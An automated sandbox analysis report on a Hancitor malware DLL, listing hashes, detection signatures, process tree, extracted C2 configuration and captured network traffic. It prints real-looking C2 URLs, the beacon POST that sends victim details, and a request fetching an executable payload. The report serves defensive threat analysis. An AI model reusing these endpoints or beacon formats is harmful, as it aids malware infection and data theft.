
Windows Analysis Report niberius.dll

Overview

General Information

Sample Name: niberius.dll
Analysis ID: 446231
MD5: d22d8bb38cf8d6a5ce6d8be4106350e7
SHA1: 02fc51e6572a17f5dbbc32c4e3dd03cca3c51afe
SHA256: 4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557
Tags: dll, Hancitor, MAN1, Moskalvzapoe, TA511

Detection

Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
May check the online IP address of the machine
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
PE file contains an invalid checksum
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 580 cmdline: loaddll32.exe 'C:\Users\user\Desktop\niberius.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 476 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2988 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • svchost.exe (PID: 5480 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • rundll32.exe (PID: 4156 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4692 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2492 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,More MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4708 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3704 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.664392.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
2.3.rundll32.exe.664392.0.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
2.3.rundll32.exe.664392.0.raw.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
2.3.rundll32.exe.664392.0.raw.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
6.3.rundll32.exe.4f44392.0.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started, Author: David Burkett, Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2988, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 5480
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2988, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 5480

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
Multi AV Scanner detection for domain / URL
Source: srand04rf.ru, Virustotal: Detection: 13%
Source: pospvisis.com, Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: niberius.dll, Virustotal: Detection: 9%
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.rundll32.exe.4ba0000.1.unpack, Avira: Label: TR/Hijacker.Gen
Source: 3.2.rundll32.exe.2e50000.2.unpack, Avira: Label: TR/Hijacker.Gen
Source: 14.2.rundll32.exe.4430000.2.unpack, Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match, File source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4156, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5972, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4708, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2988, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3704, type: MEMORY
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_02E52CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_02E52D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_02E52D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_02E52D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_02E52D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 12_2_0040BAB5 CryptUnprotectData,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04432CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04432D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04432D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04432D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_04432D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_04BA2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_04BA2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_04BA2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_04BA2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_04BA2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
Uses 32bit PE files
Source: niberius.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.488380273.0000000002E7D000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.488557122.000000000445D000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.488753613.0000000004BCD000.00000002.00020000.sdmp, niberius.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.3:49727
Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.3:49727 -> 95.213.179.67:80
Source: Traffic, Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.3:49788
Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.3:49788 -> 95.213.179.67:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor, URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor, URLs: http://thentabecon.ru/8/forum.php
May check the online IP address of the machine
Source: C:\Windows\SysWOW64\rundll32.exe, DNS query: name: api.ipify.org (9 identical entries)
Source: C:\Windows\SysWOW64\svchost.exe, DNS query: name: api.ipify.org (3 identical entries)
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Fri, 09 Jul 2021 01:11:14 GMT
  Content-Type: application/octet-stream
  Content-Length: 272910
  Connection: keep-alive
  Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
  ETag: "60c0e5a8-42a0e"
  Accept-Ranges: bytes
  (Data Raw hex dump omitted; the body is a PE executable, beginning with an MZ header and DOS stub)
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 23.21.173.155
Source: Joe Sandbox View, IP Address: 23.21.224.49
Source: Joe Sandbox View, IP Address: 77.222.42.67
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: SWEB-ASRU
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: api.ipify.org
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected (this POST appears 16 times in the report):
  POST /8/forum.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: sudepallon.com
  Content-Length: 121
  Cache-Control: no-cache
  Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
  (Data Raw hex dump of the same body omitted)
Source: global traffic, HTTP traffic detected:
  GET /7hfjsdfjks.exe HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: srand04rf.ru
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  GET /?format=xml HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: api.ipify.org
  Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global traffic  HTTP traffic detected: GET / HTTP/1.1
                    Accept: */*
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: api.ipify.org
                    Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
